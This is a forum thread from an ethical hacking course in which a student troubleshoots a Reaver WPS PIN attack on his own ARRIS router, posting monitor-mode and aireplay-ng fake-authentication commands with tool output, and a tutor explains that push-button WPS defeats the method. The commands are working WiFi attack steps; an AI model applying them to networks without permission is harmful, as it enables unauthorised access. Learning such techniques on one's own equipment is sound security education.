[thiago]

Dear Mr. Zaid,

Im doing the Learn Ethical Hacking From Scratch course. First of all Id like to praise you for the course, its excellent. Sorry for any translation problems, because Im from Brazil and my english is not perfect.

I`m not being able to hack my WiFi network without a wordlist. Here is what I have done so far:

I bought a budget Realtek RTL8812AU IEEE 802.11 and installed the driver on Windows (host machine). It seems to be working as I was able to hack my WiFi network using a wordlist.

In terminal I ran:
ifconfig wlan0 down ; airmon-ng check kill ; iwconfig wlan0 mode monitor ; ifconfig wlan0 up ; iwconfig

Here is the result:
wlan0 IEEE 802.11 Mode:Monitor Frequency:2.412 GHz Tx-Power=18 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

I installed the reaver version provided by you.

I splitted terminal in two.

Terminal 1 (ran second):
aireplay-ng –fakeauth 30 -a [MAC target network] -h [MAC my router] wlan0

response:
14:36:28 Sending Authentication Request (Open System) [ACK]
14:36:28 Authentication successful
14:36:28 Sending Association Request [ACK]
14:36:28 Association successful 🙂 (AID: 1)

14:36:43 Sending keep-alive packet [ACK]
14:36:56 Got a deauthentication packet! (Waiting 3 seconds)

14:36:59 Sending Authentication Request (Open System) [ACK]
14:36:59 Authentication successful
14:36:59 Sending Association Request [ACK]
14:36:59 Association successful 🙂 (AID: 1)

Terminal 2 (ran first):
aireplay-ng –fakeauth 30 -a [MAC target network] -h [MAC my router] wlan0

response:
Reaver v1.6.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching wlan0 to channel 1
[?] Restore previous session for 00:1D:D5:C4:F3:60? [n/Y] n
[+] Waiting for beacon from 00:1D:D5:C4:F3:60
[+] Associated with 00:1D:D5:C4:F3:60 (ESSID: Net Virtua 52)
[+] Trying pin “12345670”
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin “12345670”
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

What are the WPS transaction failed 0x03 and 0x02 codes?

After a while all I keep getting is the WARNING: Receive timeout occurred.

Here is my target router configuration: https://drive.google.com/file/d/1oOGBvD5EtCgOrqWVefBStdV6MtUA7B4T/view?usp=sharing

Is it possible to hack the network with the WPS mode on PBC? When I try to change the WPS mode to PIN mode, set 12345670 as the Enrolle PIN Code and click the apply button, the page reloads and it goes back to PBC mode. I`m not being able to change this setting. It is an ARRIS router.

Best regards,
Thiago

[Diego Pérez]

Hi!

As mentioned in the lecture this method only works against some routers, it won’t work against modern routers or ones that use PBC, Zaid still covered this though cause if it works then its a very good method to get the password as it is guaranteed, if it didn’t work then please try the method explained in the next lectures.
See this method only works if the target uses pin authentication, because when PBC is enabled the router will refuse all requests and all pins even if we send it the right pin unless the wps button is pressed. If you are the attacker you won’t know if your target is using PBC authentication or not, you have to try this method, it is still works against some routers and if it is working it will give you a clear way to get a key.

So it looks like you can’t change it’s configuration, in this case this attack will not work.

Greetings!
Diego

[Author]

Posts